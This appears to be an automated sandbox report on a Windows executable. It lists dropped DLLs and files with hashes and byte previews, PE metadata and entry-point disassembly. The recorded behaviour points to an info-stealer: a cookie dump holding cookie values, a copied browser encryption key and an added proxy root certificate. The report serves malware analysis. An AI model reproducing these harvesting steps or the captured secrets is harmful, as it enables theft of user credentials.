Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............\|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92080
Entropy (8bit):	5.923150781730819
Encrypted:	false
SSDEEP:	1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
MD5:	DBA9A19752B52943A0850A7E19AC600A
SHA1:	3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
SHA-256:	69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
SHA-512:	A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.\|...\|...\|...t...\|...p...\|...p...\|...p...\|...p...\|..~t...\|..._...\|...t...\|..~t...\|...\|..6\|..sk...\|..sk...\|...w...\|..sk...\|..Rich.\|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\download_engine.dll Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3512776
Entropy (8bit):	6.514740710935125
Encrypted:	false
SSDEEP:	49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
MD5:	1A87FF238DF9EA26E76B56F34E18402C
SHA1:	2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
SHA-256:	ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
SHA-512:	B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	503808
Entropy (8bit):	6.4043708480235715
Encrypted:	false
SSDEEP:	12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
MD5:	A94DC60A90EFD7A35C36D971E3EE7470
SHA1:	F936F612BC779E4BA067F77514B68C329180A380
SHA-256:	6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
SHA-512:	FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<\|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.56488891304105
Encrypted:	false
SSDEEP:	6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
MD5:	CA2F560921B7B8BE1CF555A5A18D54C3
SHA1:	432DBCF54B6F1142058B413A9D52668A2BDE011D
SHA-256:	C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
SHA-512:	23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.............K.E.........S...F.x.....F......F.G.....F.D.....F.F.....F.B.....Rich............................PE..L....Q.D...........!..............................6\|.........................`......V...............................L....C......(.... .......................0..h+......8...............................H...............l............................text............................... ..`.rdata..`...........................@..@.data....h.......`..................@....rsrc........ ......................@..@.reloc..h+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\zlib1.dll Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	59904
Entropy (8bit):	6.753320551944624
Encrypted:	false
SSDEEP:	1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
MD5:	89F6488524EAA3E5A66C5F34F3B92405
SHA1:	330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
SHA-256:	BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
SHA-512:	CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."u.-f..~f..~f..~c..~e..~c..~g..~c..~c..~c..~d..~...~d..~f..~~..~...~k..~...~d..~...~g..~...~g..~...~g..~Richf..~........................PE..L...%..M...........!.........R....................[!.........................0.........................................].......<............................ ..........................................................h............................text............................... ..`.rdata...F.......H..................@..@.data...t...........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ecv71A3.tmp Download File
Process:	C:\Users\user\AppData\Roaming\1612058829275.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x406b65bd, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	26738688
Entropy (8bit):	1.0149462571367907
Encrypted:	false
SSDEEP:	24576:nCwqTaQxuzQFetaWLSiAWaSoxoyxQgSFDb7uBi:xQFetNSzY
MD5:	411F51FBD3AEB3B57E0800BB616FE20E
SHA1:	F48260535A313A0086845E38240697888A578E87
SHA-256:	7990E93D6FAAE30F1B9AE2204948C7F7257970DC8F6AC3F762B66AC50233F3B5
SHA-512:	4F21F30A4FEAA4B24568EAF5BAB3140DF448E5D4AAC1E195F583146AE530A6FC09FDF16076FDD8DBF9693E0F5965DDFD06FF1DC1EE83DA5217AAC72E8A356B3C
Malicious:	false
Preview:	@ke.... .......50.......te3....wg.......................)..........x/.*....x..h.+.........................6..43....wI.............................................................................................Z............B.................................................................................................................. .......1....yY........................................................................................................................................................................................................................................1....yYi................qn.1....x..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xldl.dat Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	1397922
Entropy (8bit):	7.999863097294012
Encrypted:	true
SSDEEP:	24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
MD5:	18C413810B2AC24D83CD1CDCAF49E5E1
SHA1:	ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
SHA-256:	9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
SHA-512:	FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
Malicious:	false
Preview:	7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.\|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~\|J^.YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....\|..n1...Y.i4\.ZN..V....U)...\|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.

C:\Users\user\AppData\Local\Temp\xldl.dll Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	293320
Entropy (8bit):	6.347427939821131
Encrypted:	false
SSDEEP:	6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
MD5:	208662418974BCA6FAAB5C0CA6F7DEBF
SHA1:	DB216FC36AB02E0B08BF343539793C96BA393CF1
SHA-256:	A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
SHA-512:	8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1612058828915 Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	87165
Entropy (8bit):	6.102565506017432
Encrypted:	false
SSDEEP:	1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
MD5:	CC02ABB348037609ED09EC9157D55234
SHA1:	32411A59960ECF4D7434232194A5B3DB55817647
SHA-256:	62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
SHA-512:	AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Roaming\1612058829072 Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	0.7697933531254957
Encrypted:	false
SSDEEP:	96:NNw4xOoBCJyC2V8MZyFl8AlG4oNFeymw:Nu4xOoBIy7OzlG4oNH
MD5:	10539C93BEF3228B2ED2E8A7A2C02D8A
SHA1:	C293CCAF8EDAFB4C187CFC3C5328DEF1219EBDF5
SHA-256:	107639FDDC1335D086EA380AE405F5C7E83C25B07DD4868BF3E88E2774093722
SHA-512:	79994EAD2E69060E9CE8D4EE288E6FA3C6BC299A42389EB16948CC6D074A2ACEB1B17BE28A4D90A4DA3164B0510F9C525AF47D9AB066D06F2A4D063459589DCF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1612058829275.exe Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	103632
Entropy (8bit):	6.404475911013687
Encrypted:	false
SSDEEP:	1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
MD5:	EF6F72358CB02551CAEBE720FBC55F95
SHA1:	B5EE276E8D479C270ECEB497606BD44EE09FF4B8
SHA-256:	6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
SHA-512:	EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 14%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1612058829275.txt Download File
Process:	C:\Users\user\AppData\Roaming\1612058829275.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	27328
Entropy (8bit):	3.7092890861965286
Encrypted:	false
SSDEEP:	192:b3w/3wBkf3DpvI6PprepmlmE1lVT0oMoSDNlkS1:bqg+flvIKpt3VvODNlkS1
MD5:	3B1D8E74CDD69F7D029CE5ACCEE73714
SHA1:	BF71F09A81C43BB15E7CBFF694C5063B91F67DD5
SHA-256:	D25B9068F34D498145CDE1986A84CE5DABFBBA16FDD7FE92CCA2768CAC2F481B
SHA-512:	C2E5FFC9B825E3C39D59D91ADFF16E36EF024BCA0813F1B503DBA6E26A270CBB31AE2309B1ED5F554D8416FEB4A4AA88FC8B78FC8A2E631731F2128066BF9F81
Malicious:	false
Preview:	..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.0.6. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.3.1./.2.0.3.7. .1.0.:.5.9.:.1.4. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".C.O.N.S.E.N.T.".,.....".V.a.l.u.e.".:.".W.P...2.7.b.6.d.e.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".N.o.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".1.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.1.2.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.1.1. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.2.7./.2.0.1.9. .9.:.2.3.:.1.1. .A.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.h.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".N.I.D.".,.....".V.a.l.u.e.".:.".1.8.6.=.f.q.t.N.G.i.j.l.-.o.b.4.K.y.V.I.p.O.b.W.8.G.z.s.h.L.K.8.N.W.5._.R.t.7.6.F.k.H.Q.W.U.N.y.S.-.V.3.z.5.y.T.b.R.q.2.m.w.h.c.z.E.m.a.5.

C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	data
Category:	dropped
Size (bytes):	1404
Entropy (8bit):	7.169231648631483
Encrypted:	false
SSDEEP:	24:ZgGGje/+GNje/+Gd7fiSBSvG/ne102dgmYa43xSnvcSO:ZdAe/+Gpe/+G1fiSsGve1PIaAxSnvc1
MD5:	94F70083532A6F2D5821123CDC96E92A
SHA1:	EB9D68E737EA1DC2DBF1B77970550FA913952914
SHA-256:	291A077B01ABB73B9BB60572BC636753AFE6B91913F48B60EF13972C57D89CC5
SHA-512:	39F8EF2AFF8D58506BDF32DF83FC2ACF3CAC4B01F83283179E501824F1D28DD30D5DD998F41A14D702D7BA32E8B7C2B037B6D61E9AE8F8CCB31EBE39EBA17BAD
Malicious:	false
Preview:	............l......\|......_..'.. .......P...0..L0..4........m.L.b0....H........0..1;09..U...2Charles Proxy CA (19 .. 2019, DESKTOP-BNAT11U)1%0#..U....https://charlesproxy.com/ssl1.0...U....XK72 Ltd1.0...U....Auckland1.0...U....Auckland1.0...U....NZ0...000101000000Z..481215091537Z0..1;09..U...2Charles Proxy CA (19 .. 2019, DESKTOP-BNAT11U)1%0#..U....https://charlesproxy.com/ssl1.0...U....XK72 Ltd1.0...U....Auckland1.0...U....Auckland1.0...U....NZ0.."0....H.............0............>.M..O....@G...3.....d\.$...KI!...j"$\|2..}t*......%..S...#.5=.:....i8&..:T...eSP..X^F}1....1.".x.?.K4.6x-....,."G.NLZ.3.fT#T..q..Y....!.G\|..bN....`#...6.....`F6..v...W.s.2..4.'.B..3.../..T.....\|...,..B.......>?6..$?...@.-nn.!I..4#.....G4%.........t0..p0...U.......0....0..,..`.H...B..........This Root certificate was generated by Charles Proxy for SSL Proxying. If this certificate is part of a certificate chain, this means that you're browsing through Charles Proxy with SSL Proxying enabl

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.6038629847857155
TrID:	Win32 Executable (generic) a (10002005/4) 99.27% InstallShield setup (43055/19) 0.43% Windows Screen Saver (13104/52) 0.13% DOS Executable Borland C++ (13009/5) 0.13% Generic Win/DOS Executable (2004/3) 0.02%
File name:	aOn5CfTiwS.exe
File size:	5007872
MD5:	013eba0050ebe18e39978e89a56c0fab
SHA1:	85ef7c03d70e2cc7095550ce15f140e78d05f3ad
SHA256:	5fa60303a0c4fd13ecd69e7c1a17788b72605473c2fb3f93eb758010326c76e5
SHA512:	159a723e036b86996f715c460756a047436396dc20afd1a62715c734be5ab0fdc6c213fe492201142f695bf33396a49ee34010b3a9c52751b527270a2cd6af05
SSDEEP:	98304:DPWOtJfIskP639K2Bfm873n1ME5IYrS71FARhPF3a7/nzoy4kKnuaHqrTdL:SOtJfIsw63tjuE5IYrS5u7PFKrOHMxL
File Content Preview:	MZP.....................@.............................................j....L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	78dcd8d0a0f81cc6

Static PE Info

General
Entrypoint:	0x4014d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4B0AE27C [Mon Nov 23 19:29:00 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	bc6f6219c69205bfcf9e875060fcd9d1

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub ebp, 18h
mov dword ptr [ebp-14h], 004014D0h
push edx
mov edx, 00000028h
sub edx, 00000000h
add edx, dword ptr [ebp-14h]
push edx
ret
call edi
mov ebx, edx
mov esp, ebp
mov edi, eax
mov ecx, dword ptr [ecx]
pop edx
push 00000003h
push edx
mov edx, 00000047h
sub edx, 00000000h
add edx, dword ptr [ebp-14h]
push edx
ret
mov edx, ebx
mov ebx, ebp
call ebx
mov ebx, dword ptr [esi]
mov ecx, dword ptr [ebp+00h]
pop edx
mov eax, 00401852h
push edx
mov edx, 0000006Bh
sub edx, 00000000h
add edx, dword ptr [ebp-14h]
push edx
ret
mov eax, dword ptr [esi]
mov ebx, esp
mov edi, eax
mov eax, edx
inc ebx
pop ecx
mov ecx, edx
in al, dx
pop edx
push eax
push edx
mov edx, 00000087h
sub edx, 00000000h
add edx, dword ptr [ebp-14h]
push edx
ret
mov edx, ebx
inc eax
mov eax, ebx
mov ebx, esi
mov ecx, dword ptr [ecx]
pop edx
push 000013C5h
push edx
mov edx, 000000A9h
sub edx, 00000000h
add edx, dword ptr [ebp-14h]
push edx
ret
mov esi, ecx
dec ebx
mov ecx, dword ptr [esp]
dec ebx
mov edx, edi
mov edx, dword ptr [esi]
pop edx
push 00402086h
push edx
mov edx, 000000CFh
sub edx, 00000000h
add edx, dword ptr [ebp-14h]
push edx
ret
mov ebp, esi
mov esi, ecx
pop esi
mov eax, dword ptr [esi]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xcd000	0x2ea	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xca000	0x2833	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xce000	0x1a17c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe9000	0xac3c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc9000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb2000	0xb1400	False	0.459549100846	data	6.39323568191	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0xb3000	0x15000	0xce00	False	0.295092536408	data	4.58629878593	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0xc8000	0x1000	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0xc9000	0x1000	0x200	False	0.05078125	data	0.210826267787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.idata	0xca000	0x3000	0x2a00	False	0.315569196429	data	5.11321852276	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.edata	0xcd000	0x1000	0x400	False	0.392578125	data	4.24371374363	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xce000	0x1a17c	0x1a200	False	0.151054126794	data	4.38888183509	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe9000	0xb000	0xae00	False	0.00148168103448	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0xcec40	0x134	data	English	United States
RT_CURSOR	0xced74	0x134	data	English	United States
RT_CURSOR	0xceea8	0x134	data	English	United States
RT_CURSOR	0xcefdc	0x134	data	English	United States
RT_CURSOR	0xcf110	0x134	data	English	United States
RT_CURSOR	0xcf244	0x134	data	English	United States
RT_CURSOR	0xcf378	0x134	data	English	United States
RT_BITMAP	0xcf4ac	0x1d0	data	English	United States
RT_BITMAP	0xcf67c	0x1e4	data	English	United States
RT_BITMAP	0xcf860	0x1d0	data	English	United States
RT_BITMAP	0xcfa30	0x1d0	data	English	United States
RT_BITMAP	0xcfc00	0x1d0	data	English	United States
RT_BITMAP	0xcfdd0	0x1d0	data	English	United States
RT_BITMAP	0xcffa0	0x1d0	data	English	United States
RT_BITMAP	0xd0170	0x1d0	data	English	United States
RT_BITMAP	0xd0340	0x1d0	data	English	United States
RT_BITMAP	0xd0510	0x1d0	data	English	United States
RT_BITMAP	0xd06e0	0xe8	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xd07c8	0x2e8	data	English	United States
RT_DIALOG	0xd0ab0	0x52	data
RT_DIALOG	0xd0b04	0x52	data
RT_STRING	0xd0b58	0x19c	data
RT_STRING	0xd0cf4	0xe0	data
RT_STRING	0xd0dd4	0xbc	data
RT_STRING	0xd0e90	0x368	data
RT_STRING	0xd11f8	0x498	data
RT_STRING	0xd1690	0x330	data
RT_STRING	0xd19c0	0x398	data
RT_STRING	0xd1d58	0x390	data
RT_STRING	0xd20e8	0x428	data
RT_STRING	0xd2510	0x484	data
RT_STRING	0xd2994	0x384	data
RT_STRING	0xd2d18	0x120	data
RT_STRING	0xd2e38	0xec	data
RT_STRING	0xd2f24	0x130	data
RT_STRING	0xd3054	0x414	data
RT_STRING	0xd3468	0x3f8	data
RT_RCDATA	0xd3860	0x10	data
RT_RCDATA	0xd3870	0x2abb	Delphi compiled form 'TAboutBox'
RT_RCDATA	0xd632c	0x10d21	Delphi compiled form 'TfrmMainFormServer'
RT_RCDATA	0xe7050	0x71d	Delphi compiled form 'TfrmServiceInstallParams'
RT_RCDATA	0xe7770	0x494	Delphi compiled form 'TLoginDialog'
